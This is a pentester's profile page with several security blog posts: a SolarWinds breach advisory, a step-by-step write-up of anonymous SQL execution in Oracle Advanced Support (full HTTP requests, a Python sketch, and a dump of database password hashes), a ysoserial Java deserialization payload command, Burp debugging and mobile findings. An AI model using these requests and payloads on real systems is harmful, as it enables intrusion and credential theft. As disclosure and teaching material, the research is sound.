Eric Gruber

Eric Gruber serves as the Director of Attack Surface Management at NetSPI, where he is responsible for overseeing the platform's research and technical direction, expanding its security capabilities, and managing the operations team that performs continuous testing within it. With over a decade of experience at NetSPI, Eric is a recognized expert in network, web application, thick application, and mobile penetration testing, and he actively contributes to the development of applications and scripts for the company's penetration testing team.

Eric's academic background includes a BS and a Master's degree in Computer Science from the University of Minnesota, with a focus on networking, security, and software engineering. His professional experience encompasses work in the education, information technology, and information security sectors, where he has been involved in designing and developing software, maintaining information systems, and researching security topics.
More by Eric Gruber

Mastering the Art of Attack Surface Management (webinar, February 21, 2022)

Security leaders today are experiencing change at a rate like never before. Whether they're going through an acquisition, deploying a remote workforce, or migrating workloads to the cloud, change is inevitable, and unknown assets are sure to exist on their networks.

Detecting and preventing the unknown is no easy task. But what you don’t know can hurt you. So, how can we identify vulnerable exposures before adversaries do?

It’s time for organizations to master the art of attack surface management. How? By implementing a human-first, continuous, risk-based approach.

In this webinar, participants will learn:

  • What attack surface management is
  • How cyber attack surface management fits into broader enterprise-wide vulnerability management efforts
  • How to improve your attack surface visibility with continuous penetration testing
  • Why a human-first approach is the future of attack surface monitoring
  • An introduction to NetSPI’s Attack Surface Management (ASM) solution and our ASM Operations Team

FireEye, SolarWinds, U.S. Treasury: What’s Happening in the Cyber Security World Right Now? (December 15, 2020)

As we write this post, you’ve likely heard about the FireEye and U.S. government agency breaches that occurred over the past week. We know now the breaches have been linked back to a supply chain attack on the SolarWinds Orion Platform, a software platform that manages IT operations and products for over 300,000 organizations, including over 425 of the Fortune 500, all ten of the top U.S. telecommunications companies, all five branches of the U.S. Military, all five of the top U.S. accounting firms, and many, many more.

While FireEye, the U.S. Treasury, and National Telecommunications and Information Administration (NTIA) were the first to report a security breach, the breadth of SolarWinds’ customer base is an indicator that the breaches are seemingly the tip of the iceberg.

For the sake of information sharing, here is an overview of the attacks, immediate steps you can take to identify whether you have fallen victim, and tips for protecting your organization as communicated by FireEye, SolarWinds, and NetSPI. For the full technical deep-dive, we highly recommend the FireEye blog post.

Overview: SolarWinds Orion Manual Supply Chain Attack

On December 13, SolarWinds issued a security advisory alerting to a manual supply chain attack on its Orion Platform software builds for versions 2019.4 HF 5 through 2020.2.1, released between March 2020 and June 2020.

FireEye discovered the attack and suggests it is a state-sponsored global intrusion campaign by a group named UNC2452 - though many industry experts are attributing the attack to APT29, a group of hackers associated with the Russian Foreign Intelligence Service.

  • Attack Origin: UNC2452 gained access to victims via trojan-based updates to SolarWinds’ Orion IT monitoring and management software, distributing malware called SUNBURST. Multiple trojanized updates were digitally signed and subsequently deployed via this URL: hxxps://downloads.solarwinds[.]com/solarwinds/CatalogResources/Core/2019.4/2019.4.5220.20574 /SolarWinds-Core-v2019.4.5220-Hotfix5.msp. The downloaded file is a standard Windows Installer Patch file, which includes the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component.
  • How It Works: The digitally signed SolarWinds.Orion.Core.BusinessLayer.dll file is a component of the Orion Improvement Program (OIP) software framework that contains a backdoor that communicates with third party servers via the HTTP protocol. The malicious DLL gets loaded into the legitimate SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe executables and can run dormant for up to two weeks before beaconing to a subdomain of avsvmcloud[.]com. To avoid possible detection, the C2 traffic between the beaconing server and the victim is made to resemble legitimate SolarWinds communications. This includes HTTP GET, HEAD, POST and PUT requests with JSON payloads in their bodies. The HTTP responses from the C2 server communicating with the victim contain XML data that resembles .NET assembly data used for normal SolarWinds operations. Within the XML, however, is obfuscated command information that is deobfuscated and then executed by the SolarWinds process on the victim’s system.
  • Impact/Result: Following the initial compromise and deployment of SUNBURST, a variety of more capable payloads can be deployed to facilitate lateral movement and data theft. Common payloads include TEARDROP and Cobalt Strike BEACON, both of which can be loaded into memory to improve stealth of operations.

Known breaches include:

FireEye: On December 8, FireEye communicated a state-sponsored security breach through which the attackers accessed FireEye’s Red Team assessment tools used to test customers’ security. Following the breach, the company made its list of countermeasures public. FireEye has now confirmed that this attack was a result of the SolarWinds Orion supply chain attack.

U.S. Treasury and the National Telecommunications and Information Administration (NTIA): On December 13, Reuters reported that Russian-associated hackers broke into the U.S. Treasury and Commerce department’s Microsoft 365 software and have been monitoring internal email traffic. Following a National Security Council meeting at the White House over the weekend, the Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive for all federal agencies to power down SolarWinds Orion.

Organizations are frantically working to figure out if they have been a victim of the attack and how to protect themselves. Here are the immediate steps to take, according to SolarWinds, FireEye, and NetSPI’s team of offensive security experts:

  1. First, determine if SolarWinds Orion is deployed within your environment. If unsure, NetSPI recommends performing a network scan to identify the Orion agent. For example, this can be performed with Nmap by running: nmap --open -sT -p 17778,17790 x.x.x.x/xx, where x.x.x.x is the network address and xx is the subnet mask (a scripted version of this check is sketched after this list). If the Orion agent is found, follow SolarWinds’ recommendations.
  2. SolarWinds recommends customers upgrade to Orion Platform version 2020.2.1 HF 1 as soon as possible. It also asks customers with any of the products listed on the security advisory for Orion Platform v2019.4 HF 5 to update to 2019.4 HF 6. Additional suggestions can be found in the security advisory. While upgrading Orion will prevent future backdoored deployments from occurring, it will not remediate the potentially infected deployments that have already taken place via the Orion Platform.
  3. Additionally, FireEye provides a list of recommendations including its signatures to detect this threat actor and supply chain attack. Specific details on the YARA, Snort, and ClamAV signatures can be found on FireEye’s public GitHub page.
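
As a scripted alternative to the Nmap check in step 1, the same ports can be probed with a few lines of Python. This is a minimal sketch under stated assumptions: the subnet is a placeholder, and an open TCP port here only suggests, not proves, that an Orion agent is present.

import socket

ORION_PORTS = (17778, 17790)
hosts = ["10.0.0.%d" % i for i in range(1, 255)]  # hypothetical subnet; replace with your ranges

for host in hosts:
    for port in ORION_PORTS:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(0.5)
        try:
            if s.connect_ex((host, port)) == 0:  # 0 means the TCP connect succeeded
                print("Possible Orion agent: %s:%d" % (host, port))
        finally:
            s.close()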

Get in Touch: To connect with NetSPI for support with testing efforts related to the SolarWinds Orion attack, email info@NetSPI.com.

Anonymous SQL Execution in Oracle Advanced Support (July 5, 2017)

A little over a year ago I was performing a penetration test on a client's external environment. One crucial step in any external penetration test is mapping out accessible web servers. The combination of nmap with EyeWitness makes this step rather quick, as we can perform port scanning for web servers and then feed those results into EyeWitness to get screenshots. After combing through pages of screenshots that EyeWitness produced, I came across a screenshot for an Oracle Advanced Support server.

[Screenshot: EyeWitness capture of the Oracle Advanced Support login page]

Now, I had never heard of Oracle Advanced Support, but after some quick Googling it appeared to be a server that allows Oracle support to log in externally and perform whatever support is needed on Oracle systems in an environment. With that in mind, let us put on our web app pentesting hat and walk through this together. Let's start with some simple recon on the application. This includes:
  • Searching for reported vulnerabilities
  • Spidering the application using Burp
  • Enumerating common directories
  • Looking at the source of available pages
Luckily for us, the source of the main page included a link to the assets directory, which had directory listings enabled.

[Screenshot: directory listing of the assets directory]

Directory listings are great for an unknown application like this. It gives us some hope that we may be able to find something interesting that we shouldn’t have access to. Sure enough, searching through each of the directories we stumble upon the following JavaScript file:

[Screenshot: the sql-service.js JavaScript file]

Let’s make that a little easier to read.
define(["jquery", "chart-util"], function(t, e) {
    var s = function() {
        var e = this;
        e.getSqlData = function(e, s) {
            var r = "rest/data/sql/" + e,
                a = t.getJSON(r);
            return s && a.success(s), a
        }, e.createNamedSql = function(e, s) {
            var r = t.post("rest/data/sql/", e);
            return s && r.success(s), r
        }, e.getNamedSqlList = function(e) {
            var s = t.getJSON("rest/data/sql_list");
            return e && s.success(e), s
        }, e.getSqlNameList = function(e) {
            var s = t.getJSON("rest/data/sql_name_list");
            return e && s.success(e), s
        }
    };
    return new s
});
One of my favorite and often overlooked things to do during a web application penetration test is to look at the JavaScript files included in an application and see if there are any POST or GET requests that the application may or may not be using. So here we have a JavaScript file called sql-service.js. This immediately starts raising alarms in my head. From the file we have four anonymous functions performing three GET requests and one POST request via the t.getJSON and t.post methods. The functions are assigned to the following variables:
  • getSqlData
  • createNamedSql
  • getNamedSqlList
  • getSqlNameList
For the rest of the blog, I'll be referring to the anonymous functions as the variables they're assigned to. Each of the endpoints for the functions resides under /rest/data/. To break it down in terms of requests, we have the following (a scripted sketch of probing these endpoints follows the list):
  • GET /rest/data/sql
  • POST /rest/data/sql
  • GET /rest/data/sql_list
  • GET /rest/data/sql_name_list
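
If you prefer scripting the recon before reaching for a proxy, the GET endpoints can be probed in a few lines. A rough sketch using Python's requests library; the base URL is a placeholder, and verify=False mirrors the self-signed certificates commonly seen on appliances like this.

import requests

BASE = "https://host"  # hypothetical target

for path in ("rest/data/sql/test", "rest/data/sql_list", "rest/data/sql_name_list"):
    r = requests.get(BASE + "/" + path,
                     headers={"Accept": "application/json;charset=UTF-8"},
                     verify=False)
    print(path, r.status_code, r.text[:100])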
With this information, let’s fire up my favorite proxy tool, Burp, and see what happens!

Down the Rabbit Hole

Let’s try the first GET request to /rest/data/sql from the getSqlData function. We can also see from the JavaScript that there needs to be a parameter appended on. Let's just add 'test' to the end. HTTP Request:
GET /rest/data/sql/test HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json
Content-Length: 0
HTTP Response:
HTTP/1.1 404 Not Found
Content-Type: application/json
Content-Length: 20
Connection: close

Named SQL not found.
The response from the server gives us a 404 for the 'test' we appended to the end of the URL. The server also gives us a message: Named SQL not found. If we try strings other than 'test' we get the same message. We could quickly bring up Burp Intruder and attempt to enumerate potential parameter names with a dictionary list against this request to see if we can get any non-404 responses, but there's a much easier way of discovering what we should be using as parameter names. If we look at the JavaScript again, you'll notice that the names of the functions give us valuable information. We see two GET requests for the following functions: getNamedSqlList and getSqlNameList. The error message from our request above gave us a Named SQL not found error. Let's try the GET request in the function for getNamedSqlList. HTTP Request:
GET /rest/data/sql_list HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Connection: close
Content-Length: 243633

[{"id":1,"name":"sample","sql":"SELECT TIME,CPU_UTILIZATION,MEMORY_UTILIZATION FROM TIME_REPORT where TIME > :time","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":36,"name":"time","type":"date-time","value":null}]},{"id":2,"name":"cpu_only","sql":"SELECT TIME,CPU_UTILIZATION FROM TIME_REPORT","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[]},{"id":3,"name":"simple_param","sql":"SELECT TIME,CPU_USAGE FROM CPU_MONITOR WHERE CPU_USAGE < ?","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":1,"name":"cpu_usage","type":"int","value":null}]},{"id":4,"name":"double_param","sql":"SELECT TIME,CPU_USAGE FROM CPU_MONITOR WHERE CPU_USAGE between ? and ?","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":2,"name":"cpu_low","type":"int","value":null},{"id":3,"name":"cpu_high","type":"int","value":null}]},{"id":5,"name":"by_time","sql":"select time, cpu_usage from CPU_MONITOR where time(time) > ?","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":4,"name":"time","type":"string","value":null}]},{"id":10,"name":"tableTransferMethod","sql":"SELECT result_text, result_value FROM&nbsp;&nbsp; MIG_RPT_TABLE_TRANSFER_METHOD WHERE&nbsp; scenario_id = :scenario_id AND&nbsp; package_run_id = :pkg_run_id AND engagement_id = :engagement_id","dataSourceJNDI":"jdbc/acscloud","privileges":[],"paramList":[{"id":5,"name":"scenario_id","type":"int","value":null},{"id":6,"name":"pkg_run_id","type":"string","value":null},{"id":7,"name":"engagement_id","type":"int","value":null}]},{"id":16,"name":"dataTransferVolumes","sql":"select RESULT_TEXT,n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RESULT_VALUEnfrom&nbsp; MIG_RPT_DATA_TRANSFER_VOLUMEnwhere scenario_id = :scenario_idnAND&nbsp;&nbsp; package_run_id = :pkg_run_idnAND&nbsp;&nbsp; engagement_id = :engagement_id","dataSourceJNDI":"jdbc/acscloud","privileges":[],"paramList":[{"id":8,"name":"scenario_id","type":"int","value":null},{"id":9,"name":"pkg_run_id","type":"string","value":null},{"id":10,"name":"engagement_id","type":"int","value":null}]},{"id":17,"name":"dataCompressionPercentage","sql":"SELECT RESULT_TEXT,n&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RESULT_VALUEnFROM&nbsp;&nbsp; MIG_RPT_DATA_COMPRESSION_PCTnWHERE&nbsp; scenario_id = :scenario_idnAND&nbsp;&nbsp;&nbsp; package_run_id = :pkg_run_idnAND engagement_id =

...
Well that certainly gave us quite a bit of information. Let's try to dissect this a bit. We have a JSON response that contains an array with a bunch of JSON objects. Let's look at the first object in that array.
{"id":1,"name":"sample","sql":"SELECT TIME,CPU_UTILIZATION,MEMORY_UTILIZATION FROM TIME_REPORT where TIME > :time","dataSourceJNDI":"jdbc/portal","privileges":[],"paramList":[{"id":36,"name":"time","type":"date-time","value":null}]}
Here we have the following properties: name, sql, dataSourceJNDI, privileges, and paramList. The sql property is the most interesting, as it contains a SQL query as its string value. Let's take the value for name and put it into the GET request we tried earlier. HTTP Request:
GET /rest/data/sql/sample HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 400 Bad Request
Content-Type: application/json
Content-Length: 44
Connection: close

Bad Request.Param value not defined for time
Hey! We got something back! But we're missing a parameter. Let's add that in. HTTP Request:
GET /rest/data/sql/sample?time=1 HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close

[]
Well, we didn't get anything back from the server, but we didn't get an error either! Perhaps the SQL query for sample is being executed, but nothing is coming back? We could keep trying other names from the request that we performed earlier, but let's look at the original JavaScript one last time. We can see that there is a function called createNamedSql that performs a POST request. We know from the response to the getNamedSqlList request that named SQL objects contain a sql property with a SQL query as the value. Maybe this POST request will allow us to execute SQL queries on the server? Let's find out.

SQL Execution

Here's the createNamedSql POST request with an empty JSON object in the body: HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json
Content-Length: 0

{}
HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Content-Length: 71
Connection: close

A system error has occurred: Column 'SQL_NAME' cannot be null [X64Q53Q]
We get an error about the column SQL_NAME. This isn't very surprising as the body contains an empty JSON object. Let's just add in a random property name and value. HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Length: 16
Content-Type: application/json;charset=UTF-8

{"test":1}
HTTP Response:
HTTP/1.1 400 Bad Request
Content-Type: text/plain
Content-Length: 365
Connection: close

Unrecognized field "test" (class com.oracle.acs.gateway.model.NamedSQL), not marked as ignorable (6 known properties: "privileges", "id", "paramList", "name", "sql", "dataSourceJNDI"])
&nbsp;at [Source: org.glassfish.jersey.message.internal.EntityInputStream@1c2f9d9d; line: 1, column: 14] (through reference chain: com.oracle.acs.gateway.model.NamedSQL["SQL_NAME"])
We get a bad request response about the field "test" being unrecognized, again, not surprising. But if you notice, the error message gives us properties we can use. Thanks Mr. Oracle server! These properties also happen to be the same ones that we were getting from the getNamedSqlList request. Let's try them out. For the dataSourceJNDI property I used one of the values from the response in the getNamedSqlList request. HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Length: 101
Content-Type: application/json;charset=UTF-8

{
    "name": "test",
    "sql":"select @@version",
    "dataSourceJNDI":"jdbc/portal"
}
That looks to be a pretty good test request. Let's see if it works. HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/plain
Content-Length: 200
Connection: close

A system error has occurred: MessageBodyWriter not found for media type=text/plain, type=class com.oracle.acs.gateway.model.NamedSQL, genericType=class com.oracle.acs.gateway.model.NamedSQL. [S2VF2VI]
We still got an error from the server, but that one is just about the content type of the response. The named SQL may still have been created. With the name field set to test, let's try the first GET request with that as the parameter. HTTP Request:
GET /rest/data/sql/test HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 24
Connection: close

[{"@@version":"5.5.37"}]
Well looky here! We got ourselves some SQL execution. Let's see who we are. HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Length: 101
Content-Type: application/json;charset=UTF-8

{
    "name": "test2",
    "sql":"SELECT USER from dual;",
    "dataSourceJNDI":"jdbc/portal"
}
HTTP Request:
GET /rest/data/sql/test2 HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 19
Connection: close

[{"USER":"SYSMAN"}]
Looks like we're the SYSMAN user, which per the Oracle docs (https://docs.oracle.com/cd/B16351_01/doc/server.102/b14196/users_secure001.htm) is used for administration. Let's see if we can grab some user hashes. HTTP Request:
POST /rest/data/sql HTTP/1.1
Host: host
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Length: 120
Content-Type: application/json;charset=UTF-8

{
    "name": "test3",
    "sql":"SELECT name, password FROM sys.user$",
    "dataSourceJNDI":"jdbc/portal"
}
HTTP Request:
GET /rest/data/sql/test3 HTTP/1.1
Host: host
Connection: close
Accept: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Content-Type: application/json;charset=UTF-8
Content-Length: 0
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 5357
Connection: close

[{"NAME":"SYS","PASSWORD":"[REDACTED]"},{"NAME":"PUBLIC","PASSWORD":null},{"NAME":"CONNECT","PASSWORD":null},{"NAME":"RESOURCE","PASSWORD":null},{"NAME":"DBA","PASSWORD":null},{"NAME":"SYSTEM","PASSWORD":"[REDACTED]"},{"NAME":"SELECT_CATALOG_ROLE","PASSWORD":null},{"NAME":"EXECUTE_CATALOG_ROLE","PASSWORD":null}
...
And we're able to get the password hashes for users in the database. I redacted and removed the majority of them. With this information, and because we're a user with administration privileges, there are quite a few escalation paths. However, for the purposes of this blog, I'll stop here.
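
Pulling the two requests together, the whole primitive fits in a few lines. A sketch against a hypothetical host, mirroring the raw requests above:

import requests

BASE = "https://host/rest/data/sql"  # placeholder host

named = {"name": "demo", "sql": "select @@version", "dataSourceJNDI": "jdbc/portal"}
requests.post(BASE, json=named, verify=False)   # create the named SQL; the 500 response can be ignored
r = requests.get(BASE + "/demo", verify=False)  # execute it by name
print(r.json())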

Conclusion

I contacted Oracle about the anonymous SQL execution here and they were quick to respond and fix the issue. The real question to me is why web services that allow arbitrary SQL queries to be executed exist in the first place. The biggest takeaway from this blog is to always look at the JavaScript files in an application. I have found functionality hidden within JavaScript files that has resulted in SQL injection, command injection, and XML external entity injection on several web application and external network penetration tests. As an exercise for any of the journeyman pentesters out there, walk through this blog and count how many vulnerabilities you can identify. Hint: there are more than three.

Java Deserialization Attacks with Burp (March 2, 2016)

Introduction

This blog is about Java deserialization and the Java Serial Killer Burp extension. If you want to download the extension and skip past all of this, head to the Github page (https://github.com/NetSPI/JavaSerialKiller). The recently discovered Java deserialization attack has provided a large window of opportunity for penetration testers to gain access to the underlying systems that Java applications communicate with. For the majority of the applications we see, we can simply proxy the connection between the application and the server to view the serialized body of the HTTP request and response, assuming that HTTP is the protocol being used for communication. For this blog, HTTP is assumed, and to perform any proxying of HTTP we will use Burp.

Burp Proxy

Here’s a simple example what a Burp proxied HTTP request with a serialized Java object in its body looks like:

[Screenshot: Burp-proxied HTTP request with a serialized State object in the body]

In this example we have a serialized object called State that is comprised of two Strings, capitol (spelled wrong in the example) and nicknames. From here, we can manipulate the request by sending it to the Repeater tab.

Generating Serialized Exploits

There are a few tools out there that will generate serialized Java objects that are able to exploit vulnerable software. I’m a big fan of Chris Frohoff’s ysoserial (https://github.com/frohoff/ysoserial.git). He has payload generators for nine exploitable software stacks at the time of this writing. Simply running the jar file with the payload type and command to execute will generate the serialized object for you. Just make sure you output it to a file:
java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 'ping netspi.com' > payload
We can then copy the serialized output into Burp using the paste from file context menu item:

[Screenshot: pasting the serialized payload into Burp via Paste from File]

Which will result in the following:

[Screenshot: the request with the serialized payload inserted]

Generating Serialized Exploits in Burp

Ysoserial works well enough, but I like to optimize my exploitation steps whenever possible. This includes removing the need to go back and forth between the command line and Burp. So I created the Burp extension Java Serial Killer to perform the serialization for me. It is essentially a modified Repeater tab that uses the payload generation from ysoserial. To use Java Serial Killer, right click on a POST request with a serialized Java object in the body and select the Send to Java Serial Killer item.

[Screenshot: the Send to Java Serial Killer context menu item]

A new tab will appear in Burp with the request copied over into a new message editor window.

[Screenshot: the request copied into the Java Serial Killer tab]

In the Java Serial Killer tab there are buttons for sending requests, serializing the body, selecting a payload type, and setting the command to run. For example, say we want to ping netspi.com using the CommonsCollections1 payload type, because we know the application is running Commons-Collections 3.1. We highlight the area we want the payload to replace, set the payload in the drop-down menu, then type the command we want and press the Serialize button. Pressing the little question mark button will also display the payload types and the software versions they target if you need more information. After you highlight once, every subsequent press of Serialize will update the payload in the request if you change the command, payload, or encoding.

[Screenshot: the serialized payload generated in the Java Serial Killer tab]

We can also Base64 encode the payload by checking the same-named checkbox. If we want to replace a specific parameter in a request with a payload, we can do that too by highlighting it and pressing Serialize. Most likely we will need to Base64 encode the payload as a parameter in XML. As Chris Frohoff adds more payloads, I plan to update Java Serial Killer accordingly.

Conclusion

I submitted the plugin to the Burp app store and I don't expect it to take too long to get approved, but if you want to try it out now, you can get it from our Github page (https://github.com/NetSPI/JavaSerialKiller). You will need to be running Java 8 for it to work.

Debugging Burp Extensions (May 26, 2015)

Burp is a very useful tool for just about any type of testing that involves HTTP. What makes it even better is the extension support that it offers. People can complement the features that Burp has to offer with their own extensions to create a very powerful, well-rounded application testing tool that is tailored to their needs. Sometimes, however, our extensions don't work the way we want and require additional testing. In this blog post, I'm going to walk through how we can set up debugging in Burp and our IDE when we create Burp extensions. Essentially, we are just going to be setting up Java remote debugging. This should hopefully be a useful tutorial for people who are creating buggy Burp extensions and want to figure out why they aren't working. It should also be especially helpful for first-time Java developers who are not accustomed to Java's debugging capabilities. This will not be a tutorial on creating Burp extensions. For help on that, I'll refer you to the PortSwigger extender tutorials.

Requirements

  • Java SDK (1.7 or 1.8)
  • Java IDE (I prefer IntelliJ)
  • Burp Suite (latest free or pro edition)

Getting Started

To begin debugging extensions in Burp we first need an extension to debug. For this example, I'll be using the Wsdler extension I created for parsing WSDL files. If you would like to follow along, the code for Wsdler is located on Github (github.com/NetSPI/Wsdler). We'll pull this down from git using git clone.
C:\Users\egruber\Repositories>git clone git@github.com:NetSPI/Wsdler.git
Cloning into 'Wsdler'...
remote: Counting objects: 458, done.
remote: Total 458 (delta 0), reused 0 (delta 0), pack-reused 458
Receiving objects: 100% (458/458), 19.59 MiB | 221.00 KiB/s, done.
Resolving deltas: 100% (204/204), done.
Checking connectivity... done.
Next, we'll open this up in our IDE. I'm using IntelliJ, but this can be accomplished using any Java IDE (I think). Select File > Open and navigate to the directory and press OK. IntelliJ should open the directory as a project in its workspace.

[Screenshot: the Wsdler project opened in IntelliJ]

Attaching the Debugger

Now that we have our Burp extension in IntelliJ, let's configure our debugger. Unfortunately, we can't just hit Run > Debug to start debugging.

[Screenshot: the Run menu without a usable Debug option]

Burp extensions are executed inside Burp. They are generally not standalone jar files with a main class. We can still debug them, however, with Java's remote debugging capability. This allows the debugger to attach to a Java process and send and receive debug information. To do this, select Edit Configurations from Run.

[Screenshot: selecting Edit Configurations from the Run menu]

A Run/Debug Configurations window should appear.

[Screenshot: the Run/Debug Configurations window]

Press the green plus sign and select Remote. You should see a window that looks like this:

[Screenshot: the new Remote configuration window]

This allows us to set up remote debugging against running processes. Name the configuration whatever you like; I use Burp. Leave all the configuration options set to the defaults unless you know what you're doing. Next, copy the first command line string, the one that starts with -agentlib. You need to add this as an argument to your Java process for the debugger to attach to it. When executed, Java will open up port 5005 for remote debugging, which allows the debugger to send commands through that port to the JVM process. Press OK at the bottom of the window. You should now see your debug configuration under Run.

[Screenshot: the Burp debug configuration listed under Run]

Now we need to start Burp with the command line argument from our debug configuration. Open up a command prompt and start Burp with the argument.
C:\>java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar burpsuite_pro_v1.6.18.jar
Listening for transport dt_socket at address: 5005
The JVM should now be listening on port 5005, the port we specified in our configuration. Next, we'll go back to our IDE and select Run > Debug Burp. The console window should pop up saying it is connected to the target VM.

[Screenshot: the console reporting it is connected to the target VM]

Setting Breakpoints

Now that we have our debugger attached to Burp we can start setting breakpoints in our extension code. First, make sure your extension is actually loaded in Burp's extender! When setting breakpoints, try not to set them on method names themselves. This can slow down Burp considerably. Instead, set breakpoints on lines of code within the methods you want to debug. The first breakpoint I'm going to set is within the WSDL parsing method in my extension. We will pause execution at the point the response byte array is set.

[Screenshot: a breakpoint set in the WSDL parsing method]

If everything is set up, go back to Burp and execute whatever is needed for your extension to be used. In this example, I will right click on the request I want to parse the WSDL from and select Parse WSDL.

[Screenshot: the Parse WSDL context menu item]

Our debugger should pause on the breakpoint immediately and display the current frames and variables.

[Screenshot: the debugger paused at the breakpoint, showing frames and variables]

We can walk through the code by selecting the step buttons on the top of the debugging menu.

[Screenshot: the step buttons at the top of the debugging menu]

Stepping over the response assignment should reveal the response variable in the variables section of the debug console. The debugger should also be on the next line of code.

[Screenshot: the response variable shown in the debug console]

We can go further and step inside functions, but I'll leave that out for now.

Conclusion

Hopefully this little tutorial is somewhat helpful when trying to fix your Burp extensions through debugging. I know I have spent hours debugging my own extensions, and the Java debugger is immensely more helpful than having System.out.println() statements everywhere.

Top 10 Critical Findings of 2014 - Mobile Applications (May 11, 2015)

We saw a very large increase in the number of mobile applications we tested in 2014. Among them were slightly more iOS applications than Android ones. In this blog post I will cover high-level trends and the top 10 critical vulnerabilities we saw in 2014 during mobile application penetration tests.

High Level Trends

There were a lot of new trends in 2014 compared to previous years. I've listed some of the more interesting ones below.
  • An increase in the use of cross-platform development frameworks such as PhoneGap, Appcelerator, and Xamarin to write applications that can be deployed to both iOS and Android
  • A decrease in wrapped browser (webview) applications
  • An increase in the use of MDM solutions to push out applications to enterprise devices
  • An increase in the use of MDM solutions to encrypt application traffic
  • A decrease in applications using the local SQLite database to store anything but configuration information
  • An increase in applications using root/jailbreak detection to prevent installation
  • An increase in certificate pinning to help prevent encrypted traffic interception
In my previous Top 10 blog post on Thick Applications, I pointed out that we spend most of our time testing web services. This is also true with mobile applications. You may also notice that many of the findings listed here are also found in the thick application post. It just goes to show that new hot-off-the-press mobile applications suffer from the same problems that plague thick applications created fifteen years ago. So without further ado, here are the top 10 critical mobile application findings for 2014, listed in order from most to least common.

SQL Injection

SQL injection is still very prevalent via the web services of a mobile application. Rarely, if ever, do we see it against an application's local SQLite database, however. We often see that application developers take the mobile aspect for granted and don’t properly protect their web services on the backend. However, it is very easy to proxy a connection between a device and a server on iOS and Android. Don't rely on protective measures such as certificate pinning to prevent traffic tampering; they're not effective. Fix the issue at its heart.
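
What fixing it at its heart looks like on the backend is parameterized queries. A minimal sketch in Python, with sqlite3 standing in for whatever database the web service actually talks to:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

def find_user(name):
    # untrusted input is bound as a parameter, never concatenated into the SQL string
    return conn.execute("SELECT email FROM users WHERE name = ?", (name,)).fetchall()

print(find_user("alice"))             # [('alice@example.com',)]
print(find_user("alice' OR '1'='1"))  # [] -- the injection attempt is treated as a literal string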

Cleartext Credential Storage

We often see that mobile applications store unencrypted credentials within configuration files and local SQLite databases on a device. Usually they can be used to access potentially sensitive data and external services. This is bad. Never store credentials anywhere on a device. If your application stores credentials to re-authenticate to a backend service without the user having to provide them again, consider using a time-limited session key that can be destroyed.

Hardcoded Credentials in Source Code

This is pretty common for us to find and primarily affects Android applications, because they can be decompiled back to nearly complete Java code if they're not obfuscated. It is possible to disassemble iOS binaries and search for credentials in them too. Never hardcode credentials in the code of an application. If a user can access your application, they can undoubtedly access anything within the source code as well. Never assume people aren't looking.

Hardcoded Encryption Keys

